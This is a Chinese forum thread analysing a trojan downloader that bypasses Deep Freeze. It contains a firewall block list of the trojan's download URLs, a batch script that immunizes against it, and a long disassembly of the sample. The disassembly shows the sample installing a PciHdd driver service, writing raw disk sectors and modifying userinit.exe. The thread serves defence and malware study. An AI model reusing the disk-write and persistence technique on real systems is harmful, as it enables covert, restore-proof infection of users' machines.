经过对样本的分析和测试，DF6.0、DF6.1、DF6.2及以前版本均被成功穿透，这是一个木马下载器，下载器通过名为PCIHDD.SYS驱动文件进行与DF的硬盘控制权的争夺，并修改userinit.exe文件。实现彻底的隐蔽开机启动。目前的临时解决方案：一是封IP，二是在c:\windows\system32\drivers下建立免疫文件： pcihdd.sys

刚写好的ROS脚本,要的自己加上去 以下为引用的内容： / ip firewall filter add chain=forward c.8s7.net/cert.cer action=reject comment="DF6.0" add chain=forward c.tomwg.com/mm/mm.jpg action=reject add chain=forward c.tomwg.com/mm/wow.jpg action=reject add chain=forward c.tomwg.com/mm/mh011.jpg action=reject add chain=forward c.tomwg.com/mm/zt.jpg action=reject add chain=forward c.tomwg.com/mm/wl.jpg action=reject add chain=forward c.tomwg.com/mm/wd.jpg action=reject add chain=forward c.tomwg.com/mm/tl.jpg action=reject add chain=forward c.tomwg.com/mm/dh3.jpg action=reject / ip firewall filter add chain=forward c.221.254.103 action=reject comment="DF6.0" 批处理注,此批处理最好是安装还原以后再用.) 以下为引用的内容： echo tinking > c:\windows\system32\drivers\pcihdd.sys echo y|cacls c:\windows\system32\drivers\pcihdd.sys /c /d everyone echo y|cacls c:\windows\system32\userinit.exe /c /d everyone echo y|cacls c:\windows\system32\userinit.exe /c /p everyone:r

穿透冰点病毒分析 004016ED >/$ 6A 00 push 0 ; /pModule = NULL 004016EF |. E8 80000000 call 00401774 ; \GetModuleHandleA 004016F4 |. A3 F0304000 mov dword ptr [4030F0], eax 004016F9 |. E8 CBF9FFFF call 004010C9 004016FE |. 68 00010000 push 100 ; /DestSizeMax = 100 (256.) 00401703 |. 68 F4304000 push 004030F4 ; |DestString = "" 00401708 |. 68 2B134000 push 0040132B ; |SrcString = "%SystemRoot%\System32\Userinit.exe" 0040170D |. E8 50000000 call 00401762 ; \ExpandEnvironmentStringsA 00401712 |. 68 F4304000 push 004030F4 ; /Arg1 = 004030F4 00401717 |. E8 32FCFFFF call 0040134E ; \111.0040134E 0040171C |. 0BC0 or eax, eax 0040171E |. 75 0C jnz short 0040172C 00401720 |. 68 E7304000 push 004030E7 ; /String = ""B2,"?,D7,"",F7,"成?,A6,"" 00401725 |. E8 68000000 call 00401792 ; \OutputDebugStringA 0040172A |. EB 06 jmp short 00401732 0040172C |> 50 push eax ; /String 0040172D |. E8 60000000 call 00401792 ; \OutputDebugStringA 00401732 |> E8 F9F8FFFF call 00401030 00401737 |. 6A 00 push 0 ; /ExitCode = 0 00401739 \. E8 1E000000 call 0040175C

沙发...呵呵

晕~~从OD里复制个反汇编代码就叫分析了？？~~连个自己的注释都没有~~看看我的吧~~

http://www.txwm.com/BBS693167.vhtml 《[原创]这才是真正的穿冰点病毒调试分析》

看过此人的帖子

基本都是COPY

00401042 E8 8D070000 call explorer.004017D4 ; jmp 到 ADVAPI32.OpenSCManagerA 00401047 0BC0 or eax,eax 00401049 74 5A je short explorer.004010A5 0040104B 8985 FCFEFFFF mov dword ptr ss:[ebp-104]> 00401051 68 FF010F00 push 0F01FF 00401056 68 29104000 push explorer.00401029 ; ASCII "PciHdd" 0040105B FFB5 FCFEFFFF push dword ptr ss:[ebp-104> 00401061 E8 74070000 call explorer.004017DA ; jmp 到 ADVAPI32.OpenServiceA 00401066 0BC0 or eax,eax 00401068 74 30 je short explorer.0040109A 0040106A 8985 F8FEFFFF mov dword ptr ss:[ebp-108]> 00401070 8D85 DCFEFFFF lea eax,dword ptr ss:[ebp-> 00401076 50 push eax 00401077 6A 01 push 1 00401079 FFB5 F8FEFFFF push dword ptr ss:[ebp-108> 0040107F E8 3E070000 call explorer.004017C2 ; jmp 到 ADVAPI32.ControlService 00401084 FFB5 F8FEFFFF push dword ptr ss:[ebp-108> 0040108A E8 3F070000 call explorer.004017CE ; jmp 到 ADVAPI32.DeleteService 0040108F FFB5 F8FEFFFF push dword ptr ss:[ebp-108> 00401095 E8 22070000 call explorer.004017BC ; jmp 到 ADVAPI32.CloseServiceHandle 0040109A FFB5 FCFEFFFF push dword ptr ss:[ebp-104> 004010A0 E8 17070000 call explorer.004017BC ; jmp 到 ADVAPI32.CloseServiceHandle 004010A5 68 00010000 push 100 004010AA 8D85 00FFFFFF lea eax,dword ptr ss:[ebp-> 004010B0 50 push eax 004010B1 68 00104000 push explorer.00401000 ; ASCII "%SystemRoot%\system32\drivers\pcihdd.sys" 004010B6 E8 A7060000 call explorer.00401762 ; jmp 到 kernel32.ExpandEnvironmentStringsA 004010BB 8D85 00FFFFFF lea eax,dword ptr ss:[ebp-> 004010C1 50 push eax 004010C2 E8 89060000 call explorer.00401750 ; jmp 到 kernel32.DeleteFileA 004010C7 C9 leave 004010C8 C3 retn 004010C9 55 push ebp 004010CA 8BEC mov ebp,esp 004010CC 81C4 C8FEFFFF add esp,-138 004010D2 68 E9030000 push 3E9 004010D7 68 E9030000 push 3E9 004010DC FF35 F0304000 push dword ptr ds:[4030F0] 004010E2 E8 81060000 call explorer.00401768 ; jmp 到 kernel32.FindResourceA 004010E7 0BC0 or eax,eax 004010E9 74 3D je short explorer.00401128 004010EB 8985 F4FEFFFF mov dword ptr ss:[ebp-10C]> 004010F1 50 push eax 004010F2 FF35 F0304000 push dword ptr ds:[4030F0] 004010F8 E8 B3060000 call explorer.004017B0 ; jmp 到 kernel32.SizeofResource 004010FD 8985 ECFEFFFF mov dword ptr ss:[ebp-114]> 00401103 FFB5 F4FEFFFF push dword ptr ss:[ebp-10C> 00401109 FF35 F0304000 push dword ptr ds:[4030F0] 0040110F E8 72060000 call explorer.00401786 ; jmp 到 kernel32.LoadResource 00401114 0BC0 or eax,eax 00401116 74 10 je short explorer.00401128 00401118 50 push eax 00401119 E8 6E060000 call explorer.0040178C ; jmp 到 kernel32.SetHandleCount 0040111E 0BC0 or eax,eax 00401120 74 06 je short explorer.00401128 00401122 8985 F0FEFFFF mov dword ptr ss:[ebp-110]> 00401128 0BC0 or eax,eax 0040112A 75 05 jnz short explorer.0040113> 0040112C E9 E3010000 jmp explorer.00401314 00401131 68 00010000 push 100 00401136 8D85 F8FEFFFF lea eax,dword ptr ss:[ebp-> 0040113C 50 push eax 0040113D 68 00104000 push explorer.00401000 ; ASCII "%SystemRoot%\system32\drivers\pcihdd.sys" 00401142 E8 1B060000 call explorer.00401762 ; jmp 到 kernel32.ExpandEnvironmentStringsA 00401147 6A 00 push 0 00401149 68 80000000 push 80 0040114E 6A 04 push 4 00401150 6A 00 push 0 00401152 6A 00 push 0 00401154 68 00000040 push 40000000 00401159 8D85 F8FEFFFF lea eax,dword ptr ss:[ebp-> 0040115F 50 push eax 00401160 E8 E5050000 call explorer.0040174A ; jmp 到 kernel32.CreateFileA 00401165 83F8 FF cmp eax,-1 00401168 75 07 jnz short explorer.0040117> 0040116A E9 A5010000 jmp explorer.00401314 0040116F EB 35 jmp short explorer.004011A> 00401171 8945 F8 mov dword ptr ss:[ebp-8],e> 00401174 6A 00 push 0 00401176 8D45 FC lea eax,dword ptr ss:[ebp-> 00401179 50 push eax 0040117A FFB5 ECFEFFFF push dword ptr ss:[ebp-114> 00401180 FFB5 F0FEFFFF push dword ptr ss:[ebp-110> 00401186 FF75 F8 push dword ptr ss:[ebp-8] 00401189 E8 28060000 call explorer.004017B6 ; jmp 到 kernel32.WriteFile 0040118E FF75 F8 push dword ptr ss:[ebp-8] 00401191 E8 0E060000 call explorer.004017A4 ; jmp 到 kernel32.SetEndOfFile 00401196 FF75 F8 push dword ptr ss:[ebp-8] 00401199 E8 D0050000 call explorer.0040176E ; jmp 到 kernel32.FlushFileBuffers 0040119E FF75 F8 push dword ptr ss:[ebp-8] 004011A1 E8 9E050000 call explorer.00401744 ; jmp 到 kernel32.CloseHandle 004011A6 68 3F000F00 push 0F003F 004011AB 6A 00 push 0 004011AD 6A 00 push 0 004011AF E8 20060000 call explorer.004017D4 ; jmp 到 ADVAPI32.OpenSCManagerA 004011B4 0BC0 or eax,eax 004011B6 0F84 34010000 je explorer.004012F0 004011BC 8985 E8FEFFFF mov dword ptr ss:[ebp-118]> 004011C2 6A 00 push 0 004011C4 6A 00 push 0 004011C6 6A 00 push 0 004011C8 6A 00 push 0 004011CA 6A 00 push 0 004011CC 8D85 F8FEFFFF lea eax,dword ptr ss:[ebp-> 004011D2 50 push eax 004011D3 6A 00 push 0 004011D5 6A 03 push 3 004011D7 6A 01 push 1 004011D9 6A 00 push 0 004011DB 68 29104000 push explorer.00401029 ; ASCII "PciHdd" 004011E0 68 29104000 push explorer.00401029 ; ASCII "PciHdd" 004011E5 FFB5 E8FEFFFF push dword ptr ss:[ebp-118> 004011EB E8 D8050000 call explorer.004017C8 ; jmp 到 ADVAPI32.CreateServiceA 004011F0 0BC0 or eax,eax 004011F2 74 16 je short explorer.0040120A 004011F4 8985 E4FEFFFF mov dword ptr ss:[ebp-11C]> 004011FA FFB5 E4FEFFFF push dword ptr ss:[ebp-11C> 00401200 E8 B7050000 call explorer.004017BC ; jmp 到 ADVAPI32.CloseServiceHandle 00401205 E9 90000000 jmp explorer.0040129A 0040120A 68 FF010F00 push 0F01FF 0040120F 68 29104000 push explorer.00401029 ; ASCII "PciHdd" 00401214 FFB5 E8FEFFFF push dword ptr ss:[ebp-118> 0040121A E8 BB050000 call explorer.004017DA ; jmp 到 ADVAPI32.OpenServiceA 0040121F 0BC0 or eax,eax 00401221 74 30 je short explorer.00401253 00401223 8985 E4FEFFFF mov dword ptr ss:[ebp-11C]> 00401229 8D85 C8FEFFFF lea eax,dword ptr ss:[ebp-> 0040122F 50 push eax 00401230 6A 01 push 1 00401232 FFB5 E4FEFFFF push dword ptr ss:[ebp-11C> 00401238 E8 85050000 call explorer.004017C2 ; jmp 到 ADVAPI32.ControlService 0040123D FFB5 E4FEFFFF push dword ptr ss:[ebp-11C> 00401243 E8 86050000 call explorer.004017CE ; jmp 到 ADVAPI32.DeleteService 00401248 FFB5 E4FEFFFF push dword ptr ss:[ebp-11C> 0040124E E8 69050000 call explorer.004017BC ; jmp 到 ADVAPI32.CloseServiceHandle 00401253 6A 00 push 0 00401255 6A 00 push 0 00401257 6A 00 push 0 00401259 6A 00 push 0 0040125B 6A 00 push 0 0040125D 8D85 F8FEFFFF lea eax,dword ptr ss:[ebp-> 00401263 50 push eax 00401264 6A 00 push 0 00401266 6A 03 push 3 00401268 6A 01 push 1 0040126A 6A 00 push 0 0040126C 68 29104000 push explorer.00401029 ; ASCII "PciHdd" 00401271 68 29104000 push explorer.00401029 ; ASCII "PciHdd" 00401276 FFB5 E8FEFFFF push dword ptr ss:[ebp-118> 0040127C E8 47050000 call explorer.004017C8 ; jmp 到 ADVAPI32.CreateServiceA 00401281 0BC0 or eax,eax 00401283 74 13 je short explorer.00401298 00401285 8985 E4FEFFFF mov dword ptr ss:[ebp-11C]> 0040128B FFB5 E4FEFFFF push dword ptr ss:[ebp-11C> 00401291 E8 26050000 call explorer.004017BC ; jmp 到 ADVAPI32.CloseServiceHandle 00401296 EB 02 jmp short explorer.0040129> 00401298 EB 7A jmp short explorer.0040131> 0040129A 6A 10 push 10 0040129C 68 29104000 push explorer.00401029 ; ASCII "PciHdd" 004012A1 FFB5 E8FEFFFF push dword ptr ss:[ebp-118> 004012A7 E8 2E050000 call explorer.004017DA ; jmp 到 ADVAPI32.OpenServiceA 004012AC 0BC0 or eax,eax 004012AE 74 33 je short explorer.004012E3 004012B0 8985 E4FEFFFF mov dword ptr ss:[ebp-11C]> 004012B6 6A 00 push 0 004012B8 6A 00 push 0 004012BA FFB5 E4FEFFFF push dword ptr ss:[ebp-11C> 004012C0 E8 1B050000 call explorer.004017E0 ; jmp 到 ADVAPI32.StartServiceA 004012C5 0BC0 or eax,eax 004012C7 75 02 jnz short explorer.004012C> 004012C9 EB 49 jmp short explorer.0040131> 004012CB FFB5 E4FEFFFF push dword ptr ss:[ebp-11C> 004012D1 E8 E6040000 call explorer.004017BC ; jmp 到 ADVAPI32.CloseServiceHandle 004012D6 FFB5 E8FEFFFF push dword ptr ss:[ebp-118> 004012DC E8 DB040000 call explorer.004017BC ; jmp 到 ADVAPI32.CloseServiceHandle 004012E1 EB 0D jmp short explorer.004012F> 004012E3 FFB5 E8FEFFFF push dword ptr ss:[ebp-118> 004012E9 E8 CE040000 call explorer.004017BC ; jmp 到 ADVAPI32.CloseServiceHandle 004012EE EB 24 jmp short explorer.0040131> 004012F0 68 00010000 push 100 004012F5 8D85 F8FEFFFF lea eax,dword ptr ss:[ebp-> 004012FB 50 push eax 004012FC 68 00104000 push explorer.00401000 ; ASCII "%SystemRoot%\system32\drivers\pcihdd.sys" 00401301 E8 5C040000 call explorer.00401762 ; jmp 到 kernel32.ExpandEnvironmentStringsA 00401306 8D85 F8FEFFFF lea eax,dword ptr ss:[ebp-> 0040130C 50 push eax 0040130D E8 3E040000 call explorer.00401750 ; jmp 到 kernel32.DeleteFileA 00401312 C9 leave 00401313 C3 retn 00401314 6A 10 push 10 00401316 6A 00 push 0 00401318 68 00304000 push explorer.00403000 0040131D 6A 00 push 0 0040131F E8 1A040000 call explorer.0040173E ; jmp 到 USER32.MessageBoxA 00401324 6A 00 push 0 00401326 E8 31040000 call explorer.0040175C ; jmp 到 kernel32.ExitProcess 0040132B 25 53797374 and eax,74737953 00401330 65:6D ins dword ptr es:[edi],dx 00401332 52 push edx 00401333 6F outs dx,dword ptr es:[edi] 00401334 6F outs dx,dword ptr es:[edi] 00401335 74 25 je short explorer.0040135C 00401337 5C pop esp 00401338 53 push ebx 00401339 79 73 jns short explorer.004013A> 0040133B 74 65 je short explorer.004013A2 0040133D 6D ins dword ptr es:[edi],dx 0040133E 3332 xor esi,dword ptr ds:[edx] 00401340 5C pop esp 00401341 55 push ebp 00401342 73 65 jnb short explorer.004013A> 00401344 72 69 jb short explorer.004013AF 00401346 6E outs dx,byte ptr es:[edi] 00401347 69742E 65 7865005>imul esi,dword ptr ds:[esi> 0040134F 8BEC mov ebp,esp 00401351 81C4 ACFAFFFF add esp,-554 00401357 60 pushad 00401358 6A 00 push 0 0040135A 6A 00 push 0 0040135C 6A 03 push 3 0040135E 6A 00 push 0 00401360 6A 00 push 0 00401362 68 00000080 push 80000000 00401367 68 2E304000 push explorer.0040302E ; ASCII "\\.\PhysicalHardDisk0" 0040136C E8 D9030000 call explorer.0040174A ; jmp 到 kernel32.CreateFileA 00401371 83F8 FF cmp eax,-1 00401374 0F84 64030000 je explorer.004016DE 0040137A 8985 B8FAFFFF mov dword ptr ss:[ebp-548]> 00401380 6A 00 push 0 00401382 68 00000020 push 20000000 00401387 6A 03 push 3 00401389 6A 00 push 0 0040138B 6A 03 push 3 0040138D 68 00000080 push 80000000 00401392 FF75 08 push dword ptr ss:[ebp+8] 00401395 E8 B0030000 call explorer.0040174A ; jmp 到 kernel32.CreateFileA 0040139A 83F8 FF cmp eax,-1 0040139D 0F84 27030000 je explorer.004016CA 004013A3 8945 F4 mov dword ptr ss:[ebp-C],e> 004013A6 33C0 xor eax,eax 004013A8 8945 EC mov dword ptr ss:[ebp-14],> 004013AB 8945 F0 mov dword ptr ss:[ebp-10],> 004013AE 68 10010000 push 110 004013B3 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-> 004013B9 50 push eax 004013BA E8 DF030000 call explorer.0040179E ; jmp 到 ntdll.RtlZeroMemory 004013BF 6A 00 push 0 004013C1 8D45 E8 lea eax,dword ptr ss:[ebp-> 004013C4 50 push eax 004013C5 68 10010000 push 110 004013CA 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-> 004013D0 50 push eax 004013D1 6A 08 push 8 004013D3 8D45 EC lea eax,dword ptr ss:[ebp-> 004013D6 50 push eax 004013D7 68 73000900 push 90073 004013DC FF75 F4 push dword ptr ss:[ebp-C] 004013DF E8 72030000 call explorer.00401756 ; jmp 到 kernel32.DeviceIoControl 004013E4 0BC0 or eax,eax 004013E6 0F84 C7020000 je explorer.004016B3 004013EC 8DBD D4FEFFFF lea edi,dword ptr ss:[ebp-> 004013F2 8B1F mov ebx,dword ptr ds:[edi] 004013F4 8D7F 10 lea edi,dword ptr ds:[edi+> 004013F7 8B45 E8 mov eax,dword ptr ss:[ebp-> 004013FA 0BDB or ebx,ebx 004013FC 0F84 B8020000 je explorer.004016BA 00401402 8B47 08 mov eax,dword ptr ds:[edi+> 00401405 8B57 0C mov edx,dword ptr ds:[edi+> 00401408 83F8 FF cmp eax,-1 0040140B 0F84 99020000 je explorer.004016AA 00401411 83FA FF cmp edx,-1 00401414 0F84 90020000 je explorer.004016AA 0040141A 8985 C4FAFFFF mov dword ptr ss:[ebp-53C]> 00401420 8995 C8FAFFFF mov dword ptr ss:[ebp-538]> 00401426 6A 00 push 0 00401428 8D45 E8 lea eax,dword ptr ss:[ebp-> 0040142B 50 push eax 0040142C 68 00020000 push 200 00401431 8D85 D4FCFFFF lea eax,dword ptr ss:[ebp-> 00401437 50 push eax 00401438 FF75 F4 push dword ptr ss:[ebp-C] 0040143B E8 58030000 call explorer.00401798 ; jmp 到 kernel32.ReadFile 00401440 FF75 F4 push dword ptr ss:[ebp-C] 00401443 E8 FC020000 call explorer.00401744 ; jmp 到 kernel32.CloseHandle 00401448 C745 F4 00000000 mov dword ptr ss:[ebp-C],0 0040144F 6A 00 push 0 00401451 6A 00 push 0 00401453 6A 03 push 3 00401455 6A 00 push 0 00401457 6A 03 push 3 00401459 68 000000C0 push C0000000 0040145E 68 44304000 push explorer.00403044 ; ASCII "\\.\PhysicalDrive0" 00401463 E8 E2020000 call explorer.0040174A ; jmp 到 kernel32.CreateFileA 00401468 83F8 FF cmp eax,-1 0040146B 0F84 40020000 je explorer.004016B1 00401471 8985 D0FAFFFF mov dword ptr ss:[ebp-530]> 00401477 6A 00 push 0 00401479 6A 00 push 0 0040147B 6A 00 push 0 0040147D FFB5 D0FAFFFF push dword ptr ss:[ebp-530> 00401483 E8 22030000 call explorer.004017AA ; jmp 到 kernel32.SetFilePointer 00401488 6A 00 push 0 0040148A 8D45 E8 lea eax,dword ptr ss:[ebp-> 0040148D 50 push eax 0040148E 68 00020000 push 200 00401493 8D85 D4FAFFFF lea eax,dword ptr ss:[ebp-> 00401499 50 push eax 0040149A FFB5 D0FAFFFF push dword ptr ss:[ebp-530> 004014A0 E8 F3020000 call explorer.00401798 ; jmp 到 kernel32.ReadFile 004014A5 8DBD D4FAFFFF lea edi,dword ptr ss:[ebp-> 004014AB 80BF BE010000 80 cmp byte ptr ds:[edi+1BE],> 004014B2 0F85 DE010000 jnz explorer.00401696 004014B8 0FB69F C2010000 movzx ebx,byte ptr ds:[edi> 004014BF 83FB 0B cmp ebx,0B 004014C2 74 0E je short explorer.004014D2 004014C4 83FB 0C cmp ebx,0C 004014C7 74 09 je short explorer.004014D2 004014C9 83FB 07 cmp ebx,7 004014CC 0F85 BB010000 jnz explorer.0040168D 004014D2 8B87 C6010000 mov eax,dword ptr ds:[edi+> 004014D8 8985 CCFAFFFF mov dword ptr ss:[ebp-534]> 004014DE 33D2 xor edx,edx 004014E0 69C0 00020000 imul eax,eax,200 004014E6 8955 E8 mov dword ptr ss:[ebp-18],> 004014E9 8BC8 mov ecx,eax 004014EB 6A 00 push 0 004014ED 8D45 E8 lea eax,dword ptr ss:[ebp-> 004014F0 50 push eax 004014F1 51 push ecx 004014F2 FFB5 D0FAFFFF push dword ptr ss:[ebp-530> 004014F8 E8 AD020000 call explorer.004017AA ; jmp 到 kernel32.SetFilePointer 004014FD 6A 00 push 0 004014FF 8D45 E8 lea eax,dword ptr ss:[ebp-> 00401502 50 push eax 00401503 68 00020000 push 200 00401508 8D85 D4FAFFFF lea eax,dword ptr ss:[ebp-> 0040150E 50 push eax 0040150F FFB5 D0FAFFFF push dword ptr ss:[ebp-530> 00401515 E8 7E020000 call explorer.00401798 ; jmp 到 kernel32.ReadFile 0040151A 8DBD D4FAFFFF lea edi,dword ptr ss:[ebp-> 00401520 0FB747 0E movzx eax,word ptr ds:[edi> 00401524 0185 CCFAFFFF add dword ptr ss:[ebp-534]> 0040152A 83FB 0B cmp ebx,0B 0040152D 74 05 je short explorer.00401534 0040152F 83FB 0C cmp ebx,0C 00401532 75 12 jnz short explorer.0040154> 00401534 0FB64F 10 movzx ecx,byte ptr ds:[edi> 00401538 8B47 24 mov eax,dword ptr ds:[edi+> 0040153B 33D2 xor edx,edx 0040153D 0FAFC1 imul eax,ecx 00401540 0185 CCFAFFFF add dword ptr ss:[ebp-534]> 00401546 8B85 C4FAFFFF mov eax,dword ptr ss:[ebp-> 0040154C 8B95 C8FAFFFF mov edx,dword ptr ss:[ebp-> 00401552 0FB64F 0D movzx ecx,byte ptr ds:[edi> 00401556 898D B4FAFFFF mov dword ptr ss:[ebp-54C]> 0040155C 0FAFC1 imul eax,ecx 0040155F 0385 CCFAFFFF add eax,dword ptr ss:[ebp-> 00401565 83D2 00 adc edx,0 00401568 69C0 00020000 imul eax,eax,200 0040156E 8995 C0FAFFFF mov dword ptr ss:[ebp-540]> 00401574 8985 BCFAFFFF mov dword ptr ss:[ebp-544]> 0040157A 6A 00 push 0 0040157C 8D85 C0FAFFFF lea eax,dword ptr ss:[ebp-> 00401582 50 push eax 00401583 FFB5 BCFAFFFF push dword ptr ss:[ebp-544> 00401589 FFB5 D0FAFFFF push dword ptr ss:[ebp-530> 0040158F E8 16020000 call explorer.004017AA ; jmp 到 kernel32.SetFilePointer 00401594 6A 00 push 0 00401596 8D45 E8 lea eax,dword ptr ss:[ebp-> 00401599 50 push eax 0040159A 68 00020000 push 200 0040159F 8D85 D4FAFFFF lea eax,dword ptr ss:[ebp-> 004015A5 50 push eax 004015A6 FFB5 D0FAFFFF push dword ptr ss:[ebp-530> 004015AC E8 E7010000 call explorer.00401798 ; jmp 到 kernel32.ReadFile 004015B1 8DBD D4FAFFFF lea edi,dword ptr ss:[ebp-> 004015B7 8DB5 D4FCFFFF lea esi,dword ptr ss:[ebp-> 004015BD B9 00020000 mov ecx,200 004015C2 F3:A6 repe cmps byte ptr es:[edi> 004015C4 0BC9 or ecx,ecx 004015C6 0F85 B8000000 jnz explorer.00401684 004015CC 6A 00 push 0 004015CE 8D85 C0FAFFFF lea eax,dword ptr ss:[ebp-> 004015D4 50 push eax 004015D5 FFB5 BCFAFFFF push dword ptr ss:[ebp-544> 004015DB FFB5 D0FAFFFF push dword ptr ss:[ebp-530> 004015E1 E8 C4010000 call explorer.004017AA ; jmp 到 kernel32.SetFilePointer 004015E6 8B85 B4FAFFFF mov eax,dword ptr ss:[ebp-> 004015EC C1E0 09 shl eax,9 004015EF 8985 B4FAFFFF mov dword ptr ss:[ebp-54C]> 004015F5 FFB5 B4FAFFFF push dword ptr ss:[ebp-54C> 004015FB 6A 40 push 40 004015FD E8 78010000 call explorer.0040177A ; jmp 到 kernel32.GlobalAlloc 00401602 0BC0 or eax,eax 00401604 74 6A je short explorer.00401670 00401606 8985 B0FAFFFF mov dword ptr ss:[ebp-550]> 0040160C B9 3E174000 mov ecx,explorer.0040173E ; jmp 到 USER32.MessageBoxA 00401611 81E9 00104000 sub ecx,explorer.00401000 ; ASCII "%SystemRoot%\system32\drivers\pcihdd.sys" 00401617 6A 00 push 0 00401619 8D45 E8 lea eax,dword ptr ss:[ebp-> 0040161C 50 push eax 0040161D FFB5 B4FAFFFF push dword ptr ss:[ebp-54C> 00401623 FFB5 B0FAFFFF push dword ptr ss:[ebp-550> 00401629 51 push ecx 0040162A 68 00104000 push explorer.00401000 ; ASCII "%SystemRoot%\system32\drivers\pcihdd.sys" 0040162F 68 043C00F0 push F0003C04 00401634 FFB5 B8FAFFFF push dword ptr ss:[ebp-548> 0040163A E8 17010000 call explorer.00401756 ; jmp 到 kernel32.DeviceIoControl 0040163F 6A 00 push 0 00401641 8D45 E8 lea eax,dword ptr ss:[ebp-> 00401644 50 push eax 00401645 FFB5 B4FAFFFF push dword ptr ss:[ebp-54C> 0040164B FFB5 B0FAFFFF push dword ptr ss:[ebp-550> 00401651 FFB5 D0FAFFFF push dword ptr ss:[ebp-530> 00401657 E8 5A010000 call explorer.004017B6 ; jmp 到 kernel32.WriteFile 0040165C FFB5 D0FAFFFF push dword ptr ss:[ebp-530> 00401662 E8 07010000 call explorer.0040176E ; jmp 到 kernel32.FlushFileBuffers 00401667 C745 E4 00000000 mov dword ptr ss:[ebp-1C],> 0040166E EB 07 jmp short explorer.0040167> 00401670 C745 E4 57304000 mov dword ptr ss:[ebp-1C],> 00401677 FFB5 B0FAFFFF push dword ptr ss:[ebp-550> 0040167D E8 FE000000 call explorer.00401780 ; jmp 到 kernel32.GlobalFree 00401682 EB 19 jmp short explorer.0040169> 00401684 C745 E4 66304000 mov dword ptr ss:[ebp-1C],> 0040168B EB 10 jmp short explorer.0040169> 0040168D C745 E4 75304000 mov dword ptr ss:[ebp-1C],> 00401694 EB 07 jmp short explorer.0040169> 00401696 C745 E4 86304000 mov dword ptr ss:[ebp-1C],> 0040169D FFB5 D0FAFFFF push dword ptr ss:[ebp-530> 004016A3 E8 9C000000 call explorer.00401744 ; jmp 到 kernel32.CloseHandle 004016A8 EB 07 jmp short explorer.004016B> 004016AA C745 E4 9D304000 mov dword ptr ss:[ebp-1C],> 004016B1 EB 07 jmp short explorer.004016B> 004016B3 C745 E4 B8304000 mov dword ptr ss:[ebp-1C],> 004016BA 837D F4 00 cmp dword ptr ss:[ebp-C],0 004016BE 74 11 je short explorer.004016D1 004016C0 FF75 F4 push dword ptr ss:[ebp-C] 004016C3 E8 7C000000 call explorer.00401744 ; jmp 到 kernel32.CloseHandle 004016C8 EB 07 jmp short explorer.004016D> 004016CA C745 E4 CD304000 mov dword ptr ss:[ebp-1C],> 004016D1 FFB5 B8FAFFFF push dword ptr ss:[ebp-548> 004016D7 E8 68000000 call explorer.00401744 ; jmp 到 kernel32.CloseHandle 004016DC EB 07 jmp short explorer.004016E> 004016DE C745 E4 DA304000 mov dword ptr ss:[ebp-1C],> 004016E5 61 popad 004016E6 8B45 E4 mov eax,dword ptr ss:[ebp-> 004016E9 C9 leave 004016EA C2 0400 retn 4 004016ED 6A 00 push 0 004016EF E8 80000000 call explorer.00401774 ; jmp 到 kernel32.GetModuleHandleA 004016F4 A3 F0304000 mov dword ptr ds:[4030F0],> 004016F9 E8 CBF9FFFF call explorer.004010C9 004016FE 68 00010000 push 100 00401703 68 F4304000 push explorer.004030F4 00401708 68 2B134000 push explorer.0040132B ; ASCII "%SystemRoot%\System32\Userinit.exe" 0040170D E8 50000000 call explorer.00401762 ; jmp 到 kernel32.ExpandEnvironmentStringsA 00401712 68 F4304000 push explorer.004030F4 00401717 E8 32FCFFFF call explorer.0040134E 0040171C 0BC0 or eax,eax 0040171E 75 0C jnz short explorer.0040172> 00401720 68 E7304000 push explorer.004030E7 00401725 E8 68000000 call explorer.00401792 ; jmp 到 kernel32.OutputDebugStringA 0040172A EB 06 jmp short explorer.0040173> 0040172C 50 push eax 0040172D E8 60000000 call explorer.00401792 ; jmp 到 kernel32.OutputDebugStringA 00401732 E8 F9F8FFFF call explorer.00401030 00401737 6A 00 push 0 00401739 E8 1E000000 call explorer.0040175C ; jmp 到 kernel32.ExitProcess 0040173E - FF25 00204000 jmp dword ptr ds:[402000] ; USER32.MessageBoxA 00401744 - FF25 70204000 jmp dword ptr ds:[402070] ; kernel32.CloseHandle 0040174A - FF25 6C204000 jmp dword ptr ds:[40206C] ; kernel32.CreateFileA 00401750 - FF25 68204000 jmp dword ptr ds:[402068] ; kernel32.DeleteFileA 00401756 - FF25 64204000 jmp dword ptr ds:[402064] ; kernel32.DeviceIoControl 0040175C - FF25 60204000 jmp dword ptr ds:[402060] ; kernel32.ExitProcess 00401762 - FF25 5C204000 jmp dword ptr ds:[40205C] ; kernel32.ExpandEnvironmentStringsA 00401768 - FF25 58204000 jmp dword ptr ds:[402058] ; kernel32.FindResourceA 0040176E - FF25 3C204000 jmp dword ptr ds:[40203C] ; kernel32.FlushFileBuffers 00401774 - FF25 28204000 jmp dword ptr ds:[402028] ; kernel32.GetModuleHandleA 0040177A - FF25 2C204000 jmp dword ptr ds:[40202C] ; kernel32.GlobalAlloc 00401780 - FF25 30204000 jmp dword ptr ds:[402030] ; kernel32.GlobalFree 00401786 - FF25 34204000 jmp dword ptr ds:[402034] ; kernel32.LoadResource 0040178C - FF25 38204000 jmp dword ptr ds:[402038] ; kernel32.SetHandleCount 00401792 - FF25 74204000 jmp dword ptr ds:[402074] ; kernel32.OutputDebugStringA 00401798 - FF25 40204000 jmp dword ptr ds:[402040] ; kernel32.ReadFile 0040179E - FF25 44204000 jmp dword ptr ds:[402044] ; ntdll.RtlZeroMemory 004017A4 - FF25 48204000 jmp dword ptr ds:[402048] ; kernel32.SetEndOfFile 004017AA - FF25 4C204000 jmp dword ptr ds:[40204C] ; kernel32.SetFilePointer 004017B0 - FF25 50204000 jmp dword ptr ds:[402050] ; kernel32.SizeofResource 004017B6 - FF25 54204000 jmp dword ptr ds:[402054] ; kernel32.WriteFile 004017BC - FF25 20204000 jmp dword ptr ds:[402020] ; ADVAPI32.CloseServiceHandle 004017C2 - FF25 1C204000 jmp dword ptr ds:[40201C] ; ADVAPI32.ControlService 004017C8 - FF25 18204000 jmp dword ptr ds:[402018] ; ADVAPI32.CreateServiceA 004017CE - FF25 14204000 jmp dword ptr ds:[402014] ; ADVAPI32.DeleteService 004017D4 - FF25 10204000 jmp dword ptr ds:[402010] ; ADVAPI32.OpenSCManagerA 004017DA - FF25 0C204000 jmp dword ptr ds:[40200C] ; ADVAPI32.OpenServiceA 004017E0 - FF25 08204000 jmp dword ptr ds:[402008] ; ADVAPI32.StartServiceA

我想了一个办法可是我是个菜鸟心有余力不足,我说出来大家看是否能实现.

在WINDOWS启动过程中不能联网,进入到欢迎界面才联网,这个怎么样?

